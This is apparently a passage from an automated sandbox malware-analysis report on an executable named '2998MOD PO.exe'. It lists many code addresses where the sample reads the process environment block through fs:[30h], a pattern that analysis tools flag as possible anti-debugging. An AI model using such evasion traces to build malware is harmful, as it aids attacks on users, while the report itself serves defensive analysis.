                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A243D4 mov eax, dword ptr fs:[00000030h]4_2_01A243D4
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A243D4 mov eax, dword ptr fs:[00000030h]4_2_01A243D4
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E3DB mov eax, dword ptr fs:[00000030h]4_2_01A2E3DB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E3DB mov eax, dword ptr fs:[00000030h]4_2_01A2E3DB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E3DB mov ecx, dword ptr fs:[00000030h]4_2_01A2E3DB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E3DB mov eax, dword ptr fs:[00000030h]4_2_01A2E3DB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197C310 mov ecx, dword ptr fs:[00000030h]4_2_0197C310
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A0310 mov ecx, dword ptr fs:[00000030h]4_2_019A0310
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]4_2_019BA30B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]4_2_019BA30B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA30B mov eax, dword ptr fs:[00000030h]4_2_019BA30B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2437C mov eax, dword ptr fs:[00000030h]4_2_01A2437C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A02349 mov eax, dword ptr fs:[00000030h]4_2_01A02349
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A28350 mov ecx, dword ptr fs:[00000030h]4_2_01A28350
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4A352 mov eax, dword ptr fs:[00000030h]4_2_01A4A352
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0035C mov ecx, dword ptr fs:[00000030h]4_2_01A0035C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0035C mov eax, dword ptr fs:[00000030h]4_2_01A0035C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A162A0 mov ecx, dword ptr fs:[00000030h]4_2_01A162A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A162A0 mov eax, dword ptr fs:[00000030h]4_2_01A162A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE284 mov eax, dword ptr fs:[00000030h]4_2_019BE284
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE284 mov eax, dword ptr fs:[00000030h]4_2_019BE284
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]4_2_01A00283
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]4_2_01A00283
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A00283 mov eax, dword ptr fs:[00000030h]4_2_01A00283
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019902A0 mov eax, dword ptr fs:[00000030h]4_2_019902A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019902A0 mov eax, dword ptr fs:[00000030h]4_2_019902A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A2C3 mov eax, dword ptr fs:[00000030h]4_2_0198A2C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]4_2_019902E1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]4_2_019902E1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019902E1 mov eax, dword ptr fs:[00000030h]4_2_019902E1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197823B mov eax, dword ptr fs:[00000030h]4_2_0197823B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986259 mov eax, dword ptr fs:[00000030h]4_2_01986259
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197A250 mov eax, dword ptr fs:[00000030h]4_2_0197A250
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30274 mov eax, dword ptr fs:[00000030h]4_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A08243 mov eax, dword ptr fs:[00000030h]4_2_01A08243
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A08243 mov ecx, dword ptr fs:[00000030h]4_2_01A08243
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3A250 mov eax, dword ptr fs:[00000030h]4_2_01A3A250
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3A250 mov eax, dword ptr fs:[00000030h]4_2_01A3A250
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]4_2_01984260
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]4_2_01984260
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984260 mov eax, dword ptr fs:[00000030h]4_2_01984260
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197826B mov eax, dword ptr fs:[00000030h]4_2_0197826B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]4_2_01A005A7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]4_2_01A005A7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A005A7 mov eax, dword ptr fs:[00000030h]4_2_01A005A7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE59C mov eax, dword ptr fs:[00000030h]4_2_019BE59C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B4588 mov eax, dword ptr fs:[00000030h]4_2_019B4588
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01982582 mov eax, dword ptr fs:[00000030h]4_2_01982582
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01982582 mov ecx, dword ptr fs:[00000030h]4_2_01982582
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A45B1 mov eax, dword ptr fs:[00000030h]4_2_019A45B1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A45B1 mov eax, dword ptr fs:[00000030h]4_2_019A45B1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019865D0 mov eax, dword ptr fs:[00000030h]4_2_019865D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA5D0 mov eax, dword ptr fs:[00000030h]4_2_019BA5D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BA5D0 mov eax, dword ptr fs:[00000030h]4_2_019BA5D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE5CF mov eax, dword ptr fs:[00000030h]4_2_019BE5CF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE5CF mov eax, dword ptr fs:[00000030h]4_2_019BE5CF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC5ED mov eax, dword ptr fs:[00000030h]4_2_019BC5ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC5ED mov eax, dword ptr fs:[00000030h]4_2_019BC5ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019825E0 mov eax, dword ptr fs:[00000030h]4_2_019825E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16500 mov eax, dword ptr fs:[00000030h]4_2_01A16500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988550 mov eax, dword ptr fs:[00000030h]4_2_01988550
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988550 mov eax, dword ptr fs:[00000030h]4_2_01988550
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]4_2_019B656A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]4_2_019B656A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]4_2_019B656A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0A4B0 mov eax, dword ptr fs:[00000030h]4_2_01A0A4B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B44B0 mov ecx, dword ptr fs:[00000030h]4_2_019B44B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019864AB mov eax, dword ptr fs:[00000030h]4_2_019864AB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3A49A mov eax, dword ptr fs:[00000030h]4_2_01A3A49A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019804E5 mov ecx, dword ptr fs:[00000030h]4_2_019804E5
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197C427 mov eax, dword ptr fs:[00000030h]4_2_0197C427
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A245A mov eax, dword ptr fs:[00000030h]4_2_019A245A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C460 mov ecx, dword ptr fs:[00000030h]4_2_01A0C460
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197645D mov eax, dword ptr fs:[00000030h]4_2_0197645D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AA470 mov eax, dword ptr fs:[00000030h]4_2_019AA470
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AA470 mov eax, dword ptr fs:[00000030h]4_2_019AA470
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AA470 mov eax, dword ptr fs:[00000030h]4_2_019AA470
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3A456 mov eax, dword ptr fs:[00000030h]4_2_01A3A456
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A347A0 mov eax, dword ptr fs:[00000030h]4_2_01A347A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2678E mov eax, dword ptr fs:[00000030h]4_2_01A2678E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019807AF mov eax, dword ptr fs:[00000030h]4_2_019807AF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E7E1 mov eax, dword ptr fs:[00000030h]4_2_01A0E7E1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198C7C0 mov eax, dword ptr fs:[00000030h]4_2_0198C7C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019847FB mov eax, dword ptr fs:[00000030h]4_2_019847FB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019847FB mov eax, dword ptr fs:[00000030h]4_2_019847FB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A007C3 mov eax, dword ptr fs:[00000030h]4_2_01A007C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A27ED mov eax, dword ptr fs:[00000030h]4_2_019A27ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A27ED mov eax, dword ptr fs:[00000030h]4_2_019A27ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A27ED mov eax, dword ptr fs:[00000030h]4_2_019A27ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980710 mov eax, dword ptr fs:[00000030h]4_2_01980710
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0710 mov eax, dword ptr fs:[00000030h]4_2_019B0710
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC700 mov eax, dword ptr fs:[00000030h]4_2_019BC700
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B273C mov eax, dword ptr fs:[00000030h]4_2_019B273C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B273C mov ecx, dword ptr fs:[00000030h]4_2_019B273C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B273C mov eax, dword ptr fs:[00000030h]4_2_019B273C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FC730 mov eax, dword ptr fs:[00000030h]4_2_019FC730
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC720 mov eax, dword ptr fs:[00000030h]4_2_019BC720
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC720 mov eax, dword ptr fs:[00000030h]4_2_019BC720
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980750 mov eax, dword ptr fs:[00000030h]4_2_01980750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2750 mov eax, dword ptr fs:[00000030h]4_2_019C2750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C2750 mov eax, dword ptr fs:[00000030h]4_2_019C2750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B674D mov esi, dword ptr fs:[00000030h]4_2_019B674D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B674D mov eax, dword ptr fs:[00000030h]4_2_019B674D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B674D mov eax, dword ptr fs:[00000030h]4_2_019B674D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01988770 mov eax, dword ptr fs:[00000030h]4_2_01988770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990770 mov eax, dword ptr fs:[00000030h]4_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A04755 mov eax, dword ptr fs:[00000030h]4_2_01A04755
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E75D mov eax, dword ptr fs:[00000030h]4_2_01A0E75D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984690 mov eax, dword ptr fs:[00000030h]4_2_01984690
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01984690 mov eax, dword ptr fs:[00000030h]4_2_01984690
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B66B0 mov eax, dword ptr fs:[00000030h]4_2_019B66B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC6A6 mov eax, dword ptr fs:[00000030h]4_2_019BC6A6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A006F1 mov eax, dword ptr fs:[00000030h]4_2_01A006F1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A006F1 mov eax, dword ptr fs:[00000030h]4_2_01A006F1
